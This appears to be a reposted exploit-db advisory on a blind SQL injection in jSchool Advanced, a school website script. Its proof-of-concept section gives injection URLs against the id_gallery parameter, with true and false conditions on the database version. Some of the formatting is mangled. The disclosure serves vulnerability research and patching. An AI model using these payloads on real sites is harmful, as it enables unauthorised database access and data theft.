JSchool is a professional educational website script. The index. php file in jSchool has the SQL injection vulnerability, which may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
JSchool Advanced (Blind SQL Injection) Vulnerability
-----------------------------------------------------------------------
Author: Don Tukulesto (root@indonesiancoder.com)
Site: http://indonesiancoder.com
Vendor: http://jogjacamp.com
Software: jSchool Advanced (http://www.jogjacamp.com/script_4_Script_Website_Murah_Instant_Sekolah.html)
Price: Rp. 1.200.000
GMT + November 21,201 0
[+] Poc:
~~~~~~~~~
Http: // server/index. php? Action = gallery. list & id_gallery = 5
Http: // server/index. php? Action = gallery. list & id_gallery = 5 and substring (@ version, 1, 1) = 5 # TRUE
Http: // server/index. php? Action = gallery. list & id_gallery = 5 and substring (@ version, 1, 1) = 4 # FALSE
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15595
From: pulog.org